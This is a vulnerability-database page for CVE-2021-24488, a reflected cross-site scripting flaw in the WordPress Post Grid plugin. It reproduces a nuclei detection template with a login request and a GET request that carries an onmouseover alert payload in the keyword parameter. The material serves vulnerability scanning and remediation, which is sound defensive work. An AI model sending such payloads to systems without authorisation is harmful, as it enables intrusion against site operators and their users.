Lucene search
K

WordPress Post Grid <2.1.8 - Cross-Site Scripting

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

WordPress Post Grid plugin <2.1.8 has Cross-Site Scripting vulnerability, allowing injection of malicious scripts into web pages, leading to potential data theft. Update to version 2.1.8 or higher

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress Post Grid 2.1.1 Plugin - Cross Site Scripting Vulnerability
2 Feb 202200:00
zdt
Circl
CVE-2021-24488
27 Apr 202309:58
circl
CNNVD
WordPress 插件跨站脚本漏洞
2 Aug 202100:00
cnnvd
CNVD
WordPress Post Grid plugin cross-site scripting vulnerability
5 Aug 202100:00
cnvd
CVE
CVE-2021-24488
2 Aug 202110:32
cve
Cvelist
CVE-2021-24488 Post Grid < 2.1.8 - Reflected Cross-Site Scripting (XSS)
2 Aug 202110:32
cvelist
Exploit DB
WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
2 Feb 202200:00
exploitdb
EUVD
EUVD-2021-11400
7 Oct 202500:30
euvd
NVD
CVE-2021-24488
2 Aug 202111:15
nvd
OSV
CVE-2021-24488
2 Aug 202111:15
osv
Rows per page
id: CVE-2021-24488

info:
  name: WordPress Post Grid <2.1.8 - Cross-Site Scripting
  author: cckuailong
  severity: medium
  description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the WordPress Post Grid plugin (2.1.8 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24488
    cwe-id: CWE-79
    epss-score: 0.11291
    epss-percentile: 0.95438
    cpe: cpe:2.3:a:pickplugins:post_grid:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: pickplugins
    product: post_grid
    framework: wordpress
  tags: cve2021,cve,authenticated,wpscan,xss,wp,wordpress,wp-plugin,pickplugins,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="\"onmouseover=alert(document.domain)/">'
          - 'Post Grid'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205c5416d2cb854d0abbf0872d316ea3c4b4f7506cc6277da88407c26745367cc50220646e98fcd71ed801dbc4de4585ea0216faa37185fac65d2c81b674a4b2602606:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.11291
22